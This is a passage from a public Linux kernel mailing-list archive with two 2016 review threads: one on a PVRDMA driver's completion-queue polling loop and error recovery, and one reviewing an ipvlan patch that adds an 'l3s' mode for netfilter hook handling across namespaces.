> Reviewed-by: Yuval Shaia <yuval.shaia@oracle.com>
>
> Yuval
>
> On Thu, Sep 15, 2016 at 12:07:29AM +0000, Adit Ranadive wrote:
> > On Wed, Sep 14, 2016 at 05:43:37 -0700, Yuval Shaia wrote:
> > > On Sun, Sep 11, 2016 at 09:49:19PM -0700, Adit Ranadive wrote:
> > > > +
> > > > +static int pvrdma_poll_one(struct pvrdma_cq *cq, struct pvrdma_qp
> > > **cur_qp,
> > > > +			   struct ib_wc *wc)
> > > > +{
> > > > +	struct pvrdma_dev *dev = to_vdev(cq->ibcq.device);
> > > > +	int has_data;
> > > > +	unsigned int head;
> > > > +	bool tried = false;
> > > > +	struct pvrdma_cqe *cqe;
> > > > +
> > > > +retry:
> > > > +	has_data = pvrdma_idx_ring_has_data(&cq->ring_state->rx,
> > > > +					    cq->ibcq.cqe, &head);
> > > > +	if (has_data == 0) {
> > > > +		if (tried)
> > > > +			return -EAGAIN;
> > > > +
> > > > +		/* Pass down POLL to give physical HCA a chance to poll. */
> > > > +		pvrdma_write_uar_cq(dev, cq->cq_handle |
> > > PVRDMA_UAR_CQ_POLL);
> > > > +
> > > > +		tried = true;
> > > > +		goto retry;
> > > > +	} else if (has_data == PVRDMA_INVALID_IDX) {
> > >
> > > I didn't went throw the entire life cycle of RX-ring's head and tail but you
> > > need to make sure that PVRDMA_INVALID_IDX error is recoverable one, i.e
> > > there is probability that in the next call to pvrdma_poll_one it will be fine.
> > > Otherwise it is an endless loop.
> >
> > We have never run into this issue internally but I don't think we can recover here
>
> I briefly reviewed the life cycle of RX-ring's head and tail and didn't
> caught any suspicious place that might corrupt it.
> So glad to see that you never encountered this case.
>
> > in the driver. The only way to recover would be to destroy and recreate the CQ
> > which we shouldn't do since it could be used by multiple QPs.
>
> Agree.
> But don't they hit the same problem too?
>
> > We don't have a way yet to recover in the device. Once we add that this check
> > should go away.
>
> To be honest i have no idea how to do that - i was expecting driver's vendors
> to come up with an ideas :)
> I once came up with an idea to force restart of the driver but it was
> rejected.
>
> >
> > The reason I returned an error value from poll_cq in v3 was to break the possible
> > loop so that it might give clients a chance to recover. But since poll_cq is not expected
> > to fail I just log the device error here. I can revert to that version if you want to break
> > the possible loop.
>
> Clients (ULPs) cannot recover from this case. They even do not check the
> reason of the error and treats any error as -EAGAIN.

It is because poll_one is not expected to fall.

>
> > --
> > To unsubscribe from this list: send the line "unsubscribe linux-rdma" in
> > the body of a message to majordomo@vger.kernel.org
> > More majordomo info at  http://vger.kernel.org/majordomo-info.html

[-- Attachment #2: signature.asc --]
[-- Type: application/pgp-signature, Size: 819 bytes --]

^ permalink raw reply

* Re: [PATCHv4 next 3/3] ipvlan: Introduce l3s mode
From: David Ahern @ 2016-09-18 16:57 UTC (permalink / raw)
  To: Mahesh Bandewar, netdev; +Cc: Eric Dumazet, David Miller, Mahesh Bandewar
In-Reply-To: <1474055959-12565-1-git-send-email-mahesh@bandewar.net>

On 9/16/16 1:59 PM, Mahesh Bandewar wrote:
> From: Mahesh Bandewar <maheshb@google.com>
> 
> In a typical IPvlan L3 setup where master is in default-ns and
> each slave is into different (slave) ns. In this setup egress
> packet processing for traffic originating from slave-ns will
> hit all NF_HOOKs in slave-ns as well as default-ns. However same
> is not true for ingress processing. All these NF_HOOKs are
> hit only in the slave-ns skipping them in the default-ns.
> IPvlan in L3 mode is restrictive and if admins want to deploy
> iptables rules in default-ns, this asymmetric data path makes it
> impossible to do so.
> 
> This patch makes use of the l3_rcv() (added as part of l3mdev
> enhancements) to perform input route lookup on RX packets without
> changing the skb->dev and then uses nf_hook at NF_INET_LOCAL_IN
> to change the skb->dev just before handing over skb to L4.

Today's l3 mode only allows netfilter Rx rules on ipvlan devices in slave-ns since skb->dev is changed to ipvlan device and the namespace crossing happens in rx-handler.

This new l3s mode only allows Rx rules on the parent devices (eg., eth1) in the default-ns since skb->dev stays as parent device until the NF_HOOK is run. Specifically, you can't put rules on eth1 and ipvl0 since the packet never goes through L3 with the ipvlan device set?

So the 'symmetric' is wrt to the parent device in the default-ns.

Also, there is no longer an explicit namespace crossing; that happens via the route lookup and setting dst on the skb. I guess for this use case it is ok.

> 
> Signed-off-by: Mahesh Bandewar <maheshb@google.com>
> CC: David Ahern <dsa@cumulusnetworks.com>
> ---
>  Documentation/networking/ipvlan.txt |  7 ++-
>  drivers/net/Kconfig                 |  1 +
>  drivers/net/ipvlan/ipvlan.h         |  6 +++
>  drivers/net/ipvlan/ipvlan_core.c    | 94 +++++++++++++++++++++++++++++++++++++
>  drivers/net/ipvlan/ipvlan_main.c    | 87 +++++++++++++++++++++++++++++++---
>  include/uapi/linux/if_link.h        |  1 +
>  6 files changed, 188 insertions(+), 8 deletions(-)


Reviewed-by: David Ahern <dsa@cumulusnetworks.com>

^ permalink raw reply


This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox